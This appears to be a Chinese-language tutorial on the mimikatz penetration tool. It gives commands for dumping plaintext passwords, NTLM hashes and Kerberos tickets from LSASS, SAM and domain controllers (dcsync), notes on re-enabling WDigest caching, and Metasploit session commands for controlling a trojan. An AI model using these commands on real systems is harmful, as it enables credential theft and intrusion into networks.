内网渗透工具mimikatz的使用

主要功能：

能够直接读取WindowsXP-2012等操作系统的明文密码

注意：

当目标为win10或2012R2以上时，默认在内存缓存中禁止保存明文密码，但可以通过修改注册表的方式抓取明文。

mimikatz命令

cls： 清屏 standard： 标准模块，基本命令 crypto： 加密相关模块 sekurlsa： 与证书相关的模块 kerberos： kerberos模块 privilege： 提权相关模块 process： 进程相关模块 serivce： 服务相关模块 lsadump： LsaDump模块 ts： 终端服务器模块 event： 事件模块 misc： 杂项模块 token： 令牌操作模块 vault： Windows 、证书模块 minesweeper：Mine Sweeper模块 net： dpapi： DPAPI模块（通过API或RAW访问）[数据保护应用程序编程接口] busylight： BusyLight Module sysenv： 系统环境值模块 sid： 安全标识符模块 iis： IIS XML配置模块 rpc： mimikatz的RPC控制 sr98： 用于SR98设备和T5577目标的RF模块 rdm： RDM（830AL）器件的射频模块 acr： ACR模块 version： 查看版本 exit： 退出

示例

抓取明文密码

在windows2012以上的系统不能直接获取明文密码了，当可以搭配procdump+mimikatz获取密码

mimikatz # log mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords

分析命令执行后的内容：

模块

**msv：**这项是账户对应密码的各种加密协议的密文，可以看到有LM、NTLM和SHA1加密的密文

**tspkg,wdigest,kerberos：**这个就是账户对应的明文密码了。有的时候这三个对应的也不是全部都是一样的，需要看服务器是什么角色。

**SSP：**是最新登录到其他RDP终端的账户和密码

sekurlsa模块

sekurlsa::logonpasswords 抓取用户NTLM哈希 sekurlsa::msv 加载dmp文件，并导出其中的明文密码 sekurlsa::minidump lsass.dmp sekurlsa::logonpasswords full 导出lsass.exe进程中所有的票据 sekurlsa::tickets /export

kerberos模块

列出系统中的票据 kerberos::list kerberos::tgt 清除系统中的票据 kerberos::purge 导入票据到系统中 kerberos::ptc 票据路径

lsadump模块

在域控上执行)查看域kevin.com内指定用户root的详细信息，包括NTLM哈希等 lsadump::dcsync /domain:kevin.com /user:root (在域控上执行)读取所有域用户的哈希 lsadump::lsa /patch 从sam.hive和system.hive文件中获得NTLM Hash lsadump::sam /sam:sam.hive /system:system.hive 从本地SAM文件中读取密码哈希 token::elevate lsadump::sam

wdigest

WDigest协议是在WindowsXP中被引入的,旨在与HTTP协议一起用于身份认证。默认情况下,Microsoft在多个版本的Windows(Windows XP-Windows 8.0和Windows Server 2003-Windows Server 2012)中启用了此协议,这意味着纯文本密码存储在LSASS(本地安全授权子系统服务)进程中。 Mimikatz可以与LSASS交互,允许攻击者通过以下命令检索这些凭据

mimikatz #privilege::debug mimikatz #sekurlsa::wdigest

ViperMSFconsole模块使用

输入sessions查看有哪些会话

sessions+会话id，连接该会话

输入shell，进入命令行终端

exit，断开会话，主机上的木马需重新启动

ctrl+z挂起

mimikatz # sekurlsa::logonpasswords privilege::debug 提升权限

nishang抓取NTML HASH